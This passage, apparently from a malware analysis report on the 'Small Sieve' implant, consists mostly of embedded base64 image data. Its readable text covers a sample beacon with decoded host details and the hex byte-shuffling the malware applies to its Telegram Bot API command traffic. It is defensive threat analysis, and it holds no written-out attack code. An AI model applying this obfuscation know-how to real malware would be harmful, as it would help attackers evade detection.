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)\n\n_Figure 2: Manually Generated Beacon_\n\nThe hex host data is encoded using the byte shuffling algorithm as described in the \u201cCommunications (Traffic obfuscation)\u201d section of this report. The example in figure 2 decodes to: \n\n`admin/WINDOMAIN1 | 10.17.32.18`\n\n##### \n\n##### _**Traffic obfuscation **_\n\nAlthough traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.\n\n![](image/png;base64,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